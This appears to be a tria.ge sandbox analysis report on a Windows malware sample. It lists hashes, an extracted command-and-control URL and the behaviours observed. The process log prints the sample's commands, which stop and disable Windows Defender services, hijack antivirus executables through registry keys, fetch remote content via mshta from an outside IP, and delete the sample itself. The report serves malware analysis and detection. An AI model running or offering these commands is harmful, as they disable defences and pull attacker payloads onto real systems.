Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
23/08/2024, 14:47
Static task
static1
Behavioral task
behavioral1
Sample
bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe
-
Size
2.5MB
-
MD5
bc2cfbc203f01930cb56f143d26856fb
-
SHA1
9f08d0a201ffae04d835864aad3e84a5bc7fe7f5
-
SHA256
f39643b37ec937d7955ed787baf39869d9823c4cb8d58a552e62956bc8a1c1b1
-
SHA512
951a3ca3c125c9c01803e3b363b679e3fb47afb88671306bea784080ac4d4149d53fcc803bb4e7e76bbb6550df44908031f0af32dce67d5f681a467da65ac108
-
SSDEEP
49152:zZEq5/FFhaH5k8ZMCzeDpiqzukgMBwZneQlllb7pEnYWH:NX5dPaZkaMZD1rJw/lllb7piYWH
Malware Config
Extracted
http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=EXCFTDUU&2=i-s&3=77&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\eudlkk.exe" eudlkk.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 2744 mshta.exe 7 2744 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" eudlkk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" eudlkk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe eudlkk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe eudlkk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" eudlkk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe eudlkk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" eudlkk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" eudlkk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" eudlkk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe eudlkk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe eudlkk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe eudlkk.exe -
Deletes itself 1 IoCs
pid Process 2588 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2556 eudlkk.exe -
Loads dropped DLL 2 IoCs
pid Process 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2632 sc.exe 2408 sc.exe 3048 sc.exe 332 sc.exe 2808 sc.exe 2524 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eudlkk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2556 eudlkk.exe Token: SeShutdownPrivilege 2556 eudlkk.exe Token: SeDebugPrivilege 2556 eudlkk.exe Token: SeShutdownPrivilege 2556 eudlkk.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe 2556 eudlkk.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2556 eudlkk.exe 2556 eudlkk.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2808 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 31 PID 2180 wrote to memory of 2808 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 31 PID 2180 wrote to memory of 2808 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 31 PID 2180 wrote to memory of 2808 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 31 PID 2180 wrote to memory of 2524 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 32 PID 2180 wrote to memory of 2524 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 32 PID 2180 wrote to memory of 2524 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 32 PID 2180 wrote to memory of 2524 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 32 PID 2180 wrote to memory of 2104 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 34 PID 2180 wrote to memory of 2104 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 34 PID 2180 wrote to memory of 2104 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 34 PID 2180 wrote to memory of 2104 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 34 PID 2180 wrote to memory of 2632 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 36 PID 2180 wrote to memory of 2632 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 36 PID 2180 wrote to memory of 2632 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 36 PID 2180 wrote to memory of 2632 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 36 PID 2180 wrote to memory of 2556 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 39 PID 2180 wrote to memory of 2556 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 39 PID 2180 wrote to memory of 2556 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 39 PID 2180 wrote to memory of 2556 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 39 PID 2104 wrote to memory of 2564 2104 net.exe 40 PID 2104 wrote to memory of 2564 2104 net.exe 40 PID 2104 wrote to memory of 2564 2104 net.exe 40 PID 2104 wrote to memory of 2564 2104 net.exe 40 PID 2180 wrote to memory of 2588 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 41 PID 2180 wrote to memory of 2588 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 41 PID 2180 wrote to memory of 2588 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 41 PID 2180 wrote to memory of 2588 2180 bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe 41 PID 2556 wrote to memory of 3048 2556 eudlkk.exe 43 PID 2556 wrote to memory of 3048 2556 eudlkk.exe 43 PID 2556 wrote to memory of 3048 2556 eudlkk.exe 43 PID 2556 wrote to memory of 3048 2556 eudlkk.exe 43 PID 2556 wrote to memory of 2408 2556 eudlkk.exe 44 PID 2556 wrote to memory of 2408 2556 eudlkk.exe 44 PID 2556 wrote to memory of 2408 2556 eudlkk.exe 44 PID 2556 wrote to memory of 2408 2556 eudlkk.exe 44 PID 2556 wrote to memory of 588 2556 eudlkk.exe 46 PID 2556 wrote to memory of 588 2556 eudlkk.exe 46 PID 2556 wrote to memory of 588 2556 eudlkk.exe 46 PID 2556 wrote to memory of 588 2556 eudlkk.exe 46 PID 2556 wrote to memory of 332 2556 eudlkk.exe 47 PID 2556 wrote to memory of 332 2556 eudlkk.exe 47 PID 2556 wrote to memory of 332 2556 eudlkk.exe 47 PID 2556 wrote to memory of 332 2556 eudlkk.exe 47 PID 588 wrote to memory of 2844 588 net.exe 50 PID 588 wrote to memory of 2844 588 net.exe 50 PID 588 wrote to memory of 2844 588 net.exe 50 PID 588 wrote to memory of 2844 588 net.exe 50 PID 2556 wrote to memory of 2744 2556 eudlkk.exe 52 PID 2556 wrote to memory of 2744 2556 eudlkk.exe 52 PID 2556 wrote to memory of 2744 2556 eudlkk.exe 52 PID 2556 wrote to memory of 2744 2556 eudlkk.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bc2cfbc203f01930cb56f143d26856fb_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2808
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2524
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:2564
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Users\Admin\AppData\Roaming\eudlkk.exeC:\Users\Admin\AppData\Roaming\eudlkk.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3048
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2408
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:2844
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:332
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=EXCFTDUU&2=i-s&3=77&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2744
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\BC2CFB~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2588
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5bc2cfbc203f01930cb56f143d26856fb
SHA19f08d0a201ffae04d835864aad3e84a5bc7fe7f5
SHA256f39643b37ec937d7955ed787baf39869d9823c4cb8d58a552e62956bc8a1c1b1
SHA512951a3ca3c125c9c01803e3b363b679e3fb47afb88671306bea784080ac4d4149d53fcc803bb4e7e76bbb6550df44908031f0af32dce67d5f681a467da65ac108